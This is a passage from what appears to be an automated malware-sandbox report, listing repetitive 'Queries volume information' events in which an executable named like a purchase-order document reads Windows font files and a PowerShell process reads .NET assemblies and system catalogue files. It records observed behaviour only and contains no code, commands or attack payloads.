Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
